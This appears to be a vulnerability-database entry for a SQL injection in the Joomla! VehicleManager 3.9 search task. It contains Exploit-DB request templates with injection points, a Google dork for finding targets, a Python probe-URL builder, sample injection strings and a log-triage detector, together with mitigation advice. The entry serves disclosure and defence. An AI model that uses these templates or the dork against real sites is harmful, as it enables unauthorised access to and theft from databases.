Vendor: VehicleManager
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: VehicleManager
Affected Version From: 3.9
Affected Version To: 3.9
Patch Exists: YES
Related CWE: N/A
CPE: a:ordasoft:vehiclemanager:3.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
Year: 2017

Joomla! Component VehicleManager v3.9 – SQL Injection

Joomla! Component VehicleManager v3.9 is vulnerable to SQL injection in its front-end search task (index.php?option=com_vehiclemanager&task=search). The GET parameters 'vcondition', 'transmission', 'listing_type', 'model', 'fuel_type' and 'maker' are used in the search query without adequate sanitization or escaping, so a remote attacker can inject SQL through any one of them (the [SQL] placeholder in the request templates in the Exploit-DB entry) and read data from the Joomla! database.
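As an added example (not part of the advisory and not the vendor's code), the Python below does two things a practitioner typically wants from an entry like this: it reproduces the six request templates from the Exploit-DB entry as a URL builder, so a payload is properly URL-encoded into the right parameter, and it triages web-server access-log lines for injection attempts against exactly those parameters. The base URL, the sample log lines and the SQL-metacharacter heuristic are constructed for illustration; the Itemid=70 and catid=0 values are the ones the advisory's templates use.

```python
"""Probe-URL builder and access-log triage for the VehicleManager v3.9 search SQLi.

Added example; assumptions: base URL, log lines and the metacharacter heuristic
are constructed here and are not taken from the advisory or the product.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Fixed part of every request template in the Exploit-DB entry.
FIXED = [("option", "com_vehiclemanager"), ("Itemid", "70"), ("task", "search"),
         ("submit", "Search"), ("catid", "0")]

# Search parameters in the order the templates list them, with the benign
# default each template uses for the parameters that precede the injected one.
SEARCH_PARAMS = [("maker", ""), ("fuel_type", "all"), ("model", "all"),
                 ("listing_type", "all"), ("transmission", "all"), ("vcondition", "")]

VULN_PARAMS = tuple(name for name, _ in SEARCH_PARAMS)


def build_probe_urls(base_url, payload):
    """Return {param: url}, one URL per advisory template with [SQL] replaced by payload.

    Each template keeps the parameters before the injected one and drops the rest,
    exactly as the six published request lines do. urlencode() percent-encodes the
    payload (quotes, spaces, '=') so it survives the query string intact.
    """
    urls = {}
    for i, (param, _default) in enumerate(SEARCH_PARAMS):
        pairs = FIXED + SEARCH_PARAMS[:i] + [(param, payload)]
        urls[param] = base_url.rstrip("/") + "/index.php?" + urlencode(pairs)
    return urls


# Apache/nginx combined log format (request target is percent-encoded, so no spaces).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Heuristic for SQL syntax inside a search value: quotes, comment openers, common
# keywords and time-based functions. Tuned for triage, not as a WAF rule.
SQLI_PATTERN = re.compile(
    r"['\"`]|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\b(?:or|and)\b\s+\S+\s*=",
    re.IGNORECASE,
)


def find_injection_attempts(log_lines):
    """Return [(ip, timestamp, param, decoded_value)] for com_vehiclemanager search
    requests whose vulnerable parameters carry SQL-looking input."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if qs.get("option") != ["com_vehiclemanager"] or qs.get("task") != ["search"]:
            continue
        for param in VULN_PARAMS:
            for value in qs.get(param, []):  # parse_qs already percent-decodes
                if SQLI_PATTERN.search(value):
                    hits.append((m["ip"], m["ts"], param, value))
    return hits


# Constructed sample log lines (RFC 5737 addresses): two attempts, one benign
# search, one unrelated request against com_content.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Feb/2017:10:01:02 +0000] "GET /index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=1%27+AND+1%3D1--+- HTTP/1.1" 200 5123',
    '198.51.100.9 - - [22/Feb/2017:10:05:44 +0000] "GET /index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=Ford&fuel_type=all&model=all HTTP/1.1" 200 4870',
    '203.0.113.7 - - [22/Feb/2017:10:06:10 +0000] "GET /index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=%27+UNION+SELECT+1%2C2%2C3--+- HTTP/1.1" 200 3001',
    '192.0.2.5 - - [22/Feb/2017:10:07:00 +0000] "GET /index.php?option=com_content&view=article&id=1%27 HTTP/1.1" 404 210',
]


if __name__ == "__main__":
    for param, url in build_probe_urls("http://localhost/joomla", "1' AND 1=1").items():
        print(param, url)
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("suspicious:", hit)
```

The builder is useful with any SQLi verification tool that takes a URL and an injection marker; the log triage only reports requests that reach the search task of this component, which keeps the metacharacter heuristic from flooding results with unrelated Joomla! traffic.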

Mitigation:

The vendor has released a patch for this issue. Update VehicleManager to the latest version, which supersedes the affected 3.9 release.

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
# Google Dork: inurl:index.php?option=com_vehiclemanager
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
# Demo: http://ordasvit.com/joomla-vehicle-manager/
# Version: 3.9
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
# # # # #